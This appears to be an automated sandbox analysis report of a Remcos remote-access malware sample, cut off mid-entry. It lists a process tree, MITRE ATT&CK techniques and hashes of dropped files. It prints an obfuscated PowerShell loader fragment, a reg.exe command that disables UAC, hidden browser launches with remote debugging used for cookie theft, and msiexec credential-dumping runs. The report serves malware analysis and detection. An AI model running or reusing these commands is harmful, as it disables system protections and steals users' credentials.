rcRaditElekaTusksSpitiForvabegr)Bane ');forsrgelseskommunernes (Moderates7 'Vaga$ onGProclParaOUre BSilvaVestlPapi: S.rsDe omO,snAInamaZ naFK,nseInefj,ugsLMerssDoor Camo= Mon Str[Fa,ssRtehyEkspsDelttrecieFladMForb.ArbeTBezoE,vigX VdeT Chi.BeefECinnN roccBeskoFormd,rumiIn oNL anGBu l]Pare:bygn:MongA P fsPyraCOpbliCin.IBema.Ome gHinge GenT UdvsHumrtInfarVil ITilhNUsliGF,tt(Macr$D,ueE Lo xPhocs leENonerar.et.eleSMell)Afs ');forsrgelseskommunernes (Moderates7 'Rusl$syl GDerfl aphOQuasbB.spABundlF it:Te.bot ktP KomPBeleIGr,yGJapaN ImpoLemaRsid a V.dT,oveESpio=Me e$FabrsAbelmHyd AR dhAStilf Ov eF,reJSyndL finS T v.PaspSSkyhusig BRecosTlpetBl dRc uniSangn NonG Cha(Lill$trosPR.maOStyln.ericO,sth,nfrO al.,Geog$Skn.YTvrfaRuggwNewsnToha) onc ');forsrgelseskommunernes $Oppignorate;"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4628
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2488
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:696
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:3564
- - C:\Program Files\Google\Chrome\Application\Chrome.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2232
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffbfb3dcc40,0x7ffbfb3dcc4c,0x7ffbfb3dcc58
      4⤵
      PID:3632
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,13778609097984486118,11989820454279729354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1904 /prefetch:2
      4⤵
      PID:2736
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,13778609097984486118,11989820454279729354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2192 /prefetch:3
      4⤵
      PID:2236
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,13778609097984486118,11989820454279729354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2492 /prefetch:8
      4⤵
      PID:4836
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,13778609097984486118,11989820454279729354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3160 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1740
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,13778609097984486118,11989820454279729354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4592
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4620,i,13778609097984486118,11989820454279729354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4336 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3452
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,13778609097984486118,11989820454279729354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3140 /prefetch:8
      4⤵
      PID:4636
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4304,i,13778609097984486118,11989820454279729354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4008 /prefetch:8
      4⤵
      PID:1436
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\xqvjk"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1920
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\asabllaq"
    3⤵
    - Accesses Microsoft Outlook accounts
    - System Location Discovery: System Language Discovery
    PID:1076
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\kmoudelsdmfr"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:512
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:3160
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffbfad146f8,0x7ffbfad14708,0x7ffbfad14718
      4⤵
      PID:3128
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,11643972076810085607,2250406591901065164,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
      4⤵
      PID:1444
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,11643972076810085607,2250406591901065164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
      4⤵
      PID:2948
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,11643972076810085607,2250406591901065164,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8
      4⤵
      PID:1296
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2160,11643972076810085607,2250406591901065164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4776
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2160,11643972076810085607,2250406591901065164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1252
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2160,11643972076810085607,2250406591901065164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:464
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2160,11643972076810085607,2250406591901065164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1516

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1364

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4556

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Modify Authentication Process

T1556

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Authentication Process

T1556

Modify Registry

T1112

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
76f8f9630e364a4f374c5f016b047743

SHA1
41c5b7d4ab307307b06ec1a1973db985822ae5a1

SHA256
a533361902260820a9b4f96ee1beddea4c4486b56feeeb97b0693d0e04553807

SHA512
71cd0b1873283e1c7330d20b1b52e7c7b9b7fb1c879d7d1ef3542b771344bb38da45d4818cdda01afe30ac36092c5bbbf0a6b7bc646ac8aa50831b5c324dbd3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d34112a7b4df3c9e30ace966437c5e40

SHA1
ec07125ad2db8415cf2602d1a796dc3dfc8a54d6

SHA256
cd9665cdaf412455d6f8dbdb60c721d0cf2ac992f7cd4830d89e8c75f9cfbfbf

SHA512
49fd43e69ece9c8185ada6b6ea5bd8619cb2b31de49793d3bd80180ecf3cf8ad24cac6c494185c99623417de52465c832166f7a4890d36ac0f3be5bd7652e053

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
6f4a935bc9953a00aee8c367fb52692a

SHA1
9eb8022752883395383886c6bb8595bc89fee9bb

SHA256
4087e0dd62898e9dc1d8e5627c99e6575ab80edf0d83665b5e9bcae82db42eaf

SHA512
963c8884e90b150a9d579a36842ba0af9860a43bbebe6f02aaebbacab24af95f9de8c5a8aa0a94be2e9932fe184b9870ff0c322b2e8c918598efdc89e3b0dd7a

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
d37580189aef47ceaadcff14ff3c8089

SHA1
1f9bef00a49bed164b1d7720a5efdc8f05302577

SHA256
7c4cfb35212b78ce62f497e55d6eab079ffc94230ef729a2de0672361c439005

SHA512
012e9862508187293c12b44c3793bc8b93f748a4317ff49d06e5b1c0a252f9298978b4b4dda3f0a094de02d492a8e6c2550994fbc45192e83c7add8924a162bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
43b09bd8cf788d1671f6840df242cddc

SHA1
aba40601ac656bfb0d766875297fabc879fafcac

SHA256
6bb54b75b948e2cb9c18a9476d7c31ab776cc70ce7176adecca0e2a15e4ad5f9

SHA512
aa2694206ad00ca72c58440334ff11ffce48d33b514f9a94eeb77381813cee7db0163138062220272aed75ae4c60a2ce2f111088e40c50505438f50f338bbb4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
40B

MD5
c0db39255bdf85424a5fc3dc3193c760

SHA1
bb01e852617c7c8f377b98e46a79aee3b684b036

SHA256
e19e1a93207ae27fd5bc66781af02956bdf0f290354f45ea8cb927a999e77c0e

SHA512
e50ecc623fa1082812b9e810c1a724698cadb4711cdda954bdae7aee12a41efa5eb1c8889cd6f3a1cb3a1005b8a6b78b2076d9db9cc7f0f40dd132b7ff68f80d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

Filesize
20B

MD5
9e4e94633b73f4a7680240a0ffd6cd2c

SHA1
e68e02453ce22736169a56fdb59043d33668368f

SHA256
41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304

SHA512
193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
f589cbf52e7929a75b0211c66df1fd24

SHA1
380ad402980f1cde9f90bfacd26254c645631e2c

SHA256
2072c3c3282e9d86ae475d87d89ee317934559601d994989baadc1d114af45db

SHA512
38a481bf5e02cfad7387a396016e8de44888260e1ed2ee17cd94846791b4553c63abe02e0e528165f3028b58b728e7742edacd5b98b5ac8d3a86db84e31bfc7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index

Filesize
48B

MD5
61ae259c8769445b3d89a6301159a481

SHA1
84258ff2cf7099a2c936abd20dc59619b91f8f46

SHA256
0d9ebc698a4caf40f614c4d692c026aa835cc548b5fe1a6de8d0768414c39362

SHA512
51ca760b0b6d4ee55e484a972e284cee0538581aa77479576dd8a6a8c0b208bfd99e56da8907319118f706a27866128ab22a2eca6e4d9db1266958427326604f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

Filesize
20KB

MD5
b40e1be3d7543b6678720c3aeaf3dec3

SHA1
7758593d371b07423ba7cb84f99ebe3416624f56

SHA256
2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4

SHA512
fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

Filesize
256KB

MD5
7db72198b1ac148ca1ef977232ffe41c

SHA1
173c62999b70d78fb788586baca38514d59fb838

SHA256
1a5c9d45603728d2373559dfdc301c34034ec35d07a21119f7c25ee30a4291d7

SHA512
376fe211530562c8919868b07f519890517468cc4b2f366ddff724ab5c31b518d253594fcfd8300f14c4dcd33e1e64f7037d10d9934a8b63908617eac252b0ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

Filesize
192KB

MD5
d30bfa66491904286f1907f46212dd72

SHA1
9f56e96a6da2294512897ea2ea76953a70012564

SHA256
25bee9c6613b6a2190272775a33471a3280bd9246c386b72d872dc6d6dd90907

SHA512
44115f5aaf16bd3c8767bfb5610eba1986369f2e91d887d20a9631807c58843434519a12c9fd23af38c6adfed4dbf8122258279109968b37174a001320839237

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

Filesize
273B

MD5
ac36e6685a298f5ed6af75fa4fe233d5

SHA1
8c923811769c0440b1e17986c698cf0e1c61eda7

SHA256
e0158e42f238cb08e8512c4fd733b5f92e348e317c0578b693d4f78490bb81d7

SHA512
26cfad73a9d5732bbeea81b46f0be089db6a829055c047f881e334c2feeed0a0bf59716bda16c1960fbdcff7d976e3bbaa364bf9517429ba8daa6684ff9cb7e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

Filesize
1KB

MD5
bdfe66cbebe21c0a5f46339003356340

SHA1
1ef5100d02960b7f5ddc7bbef2bf69429de5e4ae

SHA256
08dc76926eb5861037615f515003fe601d6dc61fb694e8814441ee79f6661bef

SHA512
1444538123874ad84efe082fde4e6f8fb98c3bb7e99a0aedb9ac02083bb4b1a2d8c9707e658af87eae56986e663eae6b559a7884068f80a3aca933ae6cb849f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

Filesize
20KB

MD5
b2871626d15bbad20f0657970aca5ad9

SHA1
449f1d884f5c99defaeaa0f04059a555732f9f83

SHA256
599aeb29c9ee33307a9e9feb47b6c2eb68abd607348fe4b0e9b6137d800e6e77

SHA512
e8b51ee6dd883d8f118db60f84a36b1709dd07ab97648e11fdc8046b3d6a6b667c330bfd276dd454492a7e334184f5abf78a6613b7995c79b4c8481cb3d01ca8

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

Filesize
5KB

MD5
345855765e3009da532016b08a88b2f1

SHA1
b260058d517904df3bb5705f0564f1b268edfdd2

SHA256
1b385121b1556191256af5d5c6dadf995265d15cfe6c97da9e42138ed19e18b2

SHA512
56550a86b777ae8733a8b9a3a65eeec66c9aea2b944d14150b92b743f5bcca5307fa51c7a970e9d3cafe12e18fe1c991505e743c290791eab7145c7db9ff6a7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

Filesize
1KB

MD5
4165d9f553c78912d2bb0e9183ba96ea

SHA1
05ad7cd959182da16ef0fe6e79da5bb088de1bd0

SHA256
fd167035a1666b9bcf3084348476b1a2082f788dc75526a1e6bcfd1b6cd48ceb

SHA512
70e2e5a32a91472790e52e51ace7cb1bc1d69b4a24963553ad5ba77c2b00399e4d42898749fa51ba04db38992cae7b2d153733c820efe71b3ee662cfb57e17ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

Filesize
15KB

MD5
20daeab2ddcbe9672b3dfaea86b929cc

SHA1
0dddb2744b80577b912b5930e1344d1e758190df

SHA256
0433af61c0401d19e09a3a9f3a99af870cd809311529ec11f58e8990767533ab

SHA512
cb9d82ce37df4e836e6787b52668764616a74dff269f057621f618b32d17b25d0ae2dc8e8ed04c22c36f8eb4fee0319a7a22f02f87275beaa33a897369097d25

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

Filesize
24KB

MD5
d993daf0def8a1f0b5f14166ee1e5348

SHA1
05487faf310cf854f358154430e4e32e13229efd

SHA256
0c27a615f85652dcce230ae6fbefa960691f35119876dc083bf6d8eed60cb2f9

SHA512
ee8820c278a3a73e402b947c5631ae30983887f001a37779487feef48414b73ae5b3dd5db95c748b4bf90cd4f7c84a611f2af7f126ddb87faf0ba4010ff7aaff

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

Filesize
241B

MD5
9082ba76dad3cf4f527b8bb631ef4bb2

SHA1
4ab9c4a48c186b029d5f8ad4c3f53985499c21b0

SHA256
bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd

SHA512
621e39d497dece3f3ddf280e23d4d42e4be8518e723ecb82b48f8d315fc8a0b780abe6c7051c512d7959a1f1def3b10b5ed229d1a296443a584de6329275eb40

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG

Filesize
279B

MD5
75e9206f8551ba2ec157c60841517239

SHA1
2182af750873f91dafd2b1911af0de85a6db6e2a

SHA256
b1246f3b676d6846ce763f8d8614fec24ecca2c1cbb2be075177cfb26788f399

SHA512
8df4dd00b9ce5edcc85ec4b28b6b075f59430dcd48fe3ceb2af09af7a53e30e9c549d2f9927f249657c548dd16b301136bac02e67dc379389660720eb97d5a74

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

Filesize
80B

MD5
69449520fd9c139c534e2970342c6bd8

SHA1
230fe369a09def748f8cc23ad70fd19ed8d1b885

SHA256
3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277

SHA512
ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

Filesize
261B

MD5
a26ce3949ee253a1b57eed00d3c17cd2

SHA1
eff4eecbbe46cf92c9b69208d4e387c973281882

SHA256
0f76b7af0e770a7ff0273b30886c5b0c206df132513393c333687e9198684107

SHA512
daed4d8a4b45ba268696516b69a8708f0e2ab897eb00a1d22c92bc85045767b41f2e366d4af0d63b48a4b699de53e6a12bd21f5d19fa9dbb4e601378af2f9f8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

Filesize
40B

MD5
148079685e25097536785f4536af014b

SHA1
c5ff5b1b69487a9dd4d244d11bbafa91708c1a41

SHA256
f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8

SHA512
c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

Filesize
293B

MD5
e6c4ace7268a929fe42bb69463312a0e

SHA1
5c0a413b14c172ce90f667521f5ce4c758e2ff59

SHA256
914175e2579063c3d9d42ebafdc1c2002bb743af145fb706ca0976732b4a0ec8

SHA512
9d4e7ef8a79c0b0d3b86c645b68fe659d3eba6eacd7396e3ebfc17e61789f9dbafda1759c260b57a1e9b2ace4604dbeca7d5f908b7157430d0265815ca281a83

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

Filesize
46B

MD5
90881c9c26f29fca29815a08ba858544

SHA1
06fee974987b91d82c2839a4bb12991fa99e1bdd

SHA256
a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a

SHA512
15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

Filesize
267B

MD5
ee8b5c5d2a26fa505465dad7a6b7634d

SHA1
